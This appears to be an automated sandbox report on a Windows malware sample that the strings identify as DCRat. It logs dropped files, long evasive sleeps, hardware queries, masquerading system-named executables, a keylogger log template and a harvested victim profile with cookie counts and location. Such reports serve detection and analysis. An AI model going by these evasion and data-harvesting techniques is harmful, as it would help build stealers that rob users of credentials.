                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\sVoRDbyU.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\MnaxWgIk.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\Gnkizmcn.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\BQDZBqHE.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\LRfgsxYe.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\KzWplSMm.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\OpNfsPNf.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\Babyelsr.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\KdaYGjcg.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\blrDaWHv.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\CEHhnDDC.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\ksfcTiin.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\kjvJoyHh.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\aJMMjFdF.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\jFctadEf.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\HrZgPASq.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\kTLTKyNc.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\erTkMTCt.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rJPAIehM.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\yGhYBYcD.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\pHdSnvcQ.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ciTLwWWp.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\vzGrPbhF.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\aBctEWCA.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 3480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe TID: 3840Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe TID: 7148Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 6128Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 7056Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 3292Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7176Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\Default\SystemSettings.exe TID: 7172Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\Default\SystemSettings.exe TID: 7196Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\lv961v43L3.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe TID: 7480Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7728Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -24903104499507879s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -600000s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -599844s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -599641s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -599344s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7960Thread sleep time: -14400000s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -599156s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -599016s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598891s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598778s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598633s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598516s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598406s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598297s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598188s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -598053s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7960Thread sleep time: -300000s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -597916s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -597797s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -597686s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -597575s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -597317s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7968Thread sleep time: -60000s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -597188s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -597078s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596969s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596859s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596750s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596641s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596531s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596422s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596313s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe TID: 7976Thread sleep time: -596199s >= -30000s
                              Source: C:\Users\Default\SystemSettings.exe TID: 8136Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\Default\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\Default\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\Default\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 41_2_00007FF848F595A3 GetSystemInfo,41_2_00007FF848F595A3
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\Default\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\Default\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 30000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 600000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599844
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599641
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599344
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 3600000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599156
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599016
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598891
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598778
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598633
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598516
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598406
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598297
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598188
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598053
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 300000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597916
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597797
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597686
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597575
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597317
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 60000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597188
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597078
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596969
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596859
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596750
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596641
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596531
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596422
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596313
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596199
                              Source: C:\Users\Default\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: lWstwPVe1A.41.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: lv961v43L3.exe, 00000000.00000002.2079333667.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: lv961v43L3.exe, 00000000.00000002.2106767459.000000001B87B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}e2
                              Source: lWstwPVe1A.41.drBinary or memory string: discord.comVMware20,11696428655f
                              Source: lWstwPVe1A.41.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: lWstwPVe1A.41.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: global block list test formVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: lWstwPVe1A.41.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: lWstwPVe1A.41.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: lWstwPVe1A.41.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: lWstwPVe1A.41.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: lWstwPVe1A.41.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: lWstwPVe1A.41.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: lWstwPVe1A.41.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: lWstwPVe1A.41.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: w32tm.exe, 0000001F.00000002.2131513567.0000018703389000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3267725444.0000000001755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: lWstwPVe1A.41.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: lWstwPVe1A.41.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: lWstwPVe1A.41.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: lWstwPVe1A.41.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: lWstwPVe1A.41.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: lWstwPVe1A.41.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: lWstwPVe1A.41.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: lWstwPVe1A.41.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: lWstwPVe1A.41.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: lWstwPVe1A.41.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: lWstwPVe1A.41.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess token adjusted: Debug
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Users\Default\SystemSettings.exeProcess token adjusted: Debug
                              Source: C:\Users\Default\SystemSettings.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <style>img{width:auto;height:400px;}.b-ss{padding-bottom:5px;display:none;}.h{color:#fff;background-color:#4d4d4d;border-radius:3px;padding:3px 0 3px;text-align:center}.b{color:#fff;background-color:#4d4d4d;border-radius:3px;margin-top:10px;padding:5px 5px;opacity:80%}.hl{background-color:#3d8eeb}.b-h{margin-bottom:5px;border-bottom:1px solid #252525}.b-b{word-wrap:break-word}.c{background-color:#2a2a2a;border-radius:3px;text-align:center;vertical-align:middle;width:auto;padding:0 3px;height:17px;display:inline-block;line-height:17px;margin:0 1px 2px 1px}.k{background-color:#f85c50}.cp{color:#fff;float:right;transition:.2s;cursor:pointer;font-size:12px;padding:0 2px 0 2px;opacity:70%}.cp:hover{opacity:100%}.ss{color:#fff;float:right;transition:.2s;cursor:pointer;font-size:12px;padding:0 2px 0 2px;opacity:70%}.ss:hover{opacity:100%}</style> <script>function t(n){var c=document.createElement("textarea");c.value=n,document.body.appendChild(c),c.select(),document.execCommand("Copy"),c.remove()}function d(n){var c=n.parentElement.parentElement.children[1];c.style.display=c.style.display=="block"?"none":"block"}function e(n){var c="";Array.from(n.parentElement.parentElement.children[2].children).forEach(n=>{"c"==n.className?c+=n.innerText:c+=" ["+n.innerText+"] "});t(c);clipbridge.run(c)}</script><meta charset="utf-8"><div class="h">DCRat Keylogger # 17.10.2024</div><div><div></div></div><div class="b"><div class="b-h">Program Manager # 10:41<span class="cp" onclick="e(this)">Copy</span></div><div class="b-b"><span class="c k">Win</span><span class="c">r0D
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"?","History Count (1671)":"?","Keylogger Latest Log (0265)":"17.10.2024 10:41 / 1"},"5.0.1",60,1,"","user","609290","Windows 10 Enterprise 64 Bit","N","Y","N","C:\\Windows\\assembly\\GAC_32\\System.Data.OracleClient","O7KRAFSP7 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: y 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
